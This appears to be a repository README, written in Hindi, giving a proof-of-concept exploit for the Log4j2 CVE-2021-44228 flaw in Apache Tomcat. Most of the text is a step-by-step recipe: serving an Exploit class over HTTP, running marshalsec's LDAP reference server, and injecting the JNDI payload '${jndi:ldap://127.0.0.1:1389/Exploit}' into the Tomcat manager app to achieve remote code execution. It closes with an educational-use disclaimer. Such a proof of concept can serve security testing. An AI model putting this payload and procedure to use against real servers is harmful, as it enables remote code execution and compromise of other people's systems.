
Apache Tomcat में Log4j2 CVE-2021-44228 भेद्यता POC

git clone
cd apache-tomcat-10.0.14/bin
startup.bat
cd exploit
py -m http.server 8888
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
इनपुट ${jndi:ldap://127.0.0.1:1389/Exploit} को 'XML Configuration file path' फ़ील्ड में, http://localhost:8080/manager/html मैनेजर ऐप के अंदर डालें
एक्सप्लॉइट क्लास लोड हो जाती है और RCE लोड हो जाता है (कैलकुलेटर ऐप खुल जाएगा)
यह रिपॉज़िटरी केवल शैक्षिक उद्देश्य के लिए बनाया गया एक POC है। रिपॉज़िटरी स्वामी किसी भी हुए नुकसान के लिए ज़िम्मेदार नहीं है। एक नैतिक नोट के रूप में, बुराई मत करो।
LDAP एक्सप्लॉइट https://github.com/mbechler/marshalsec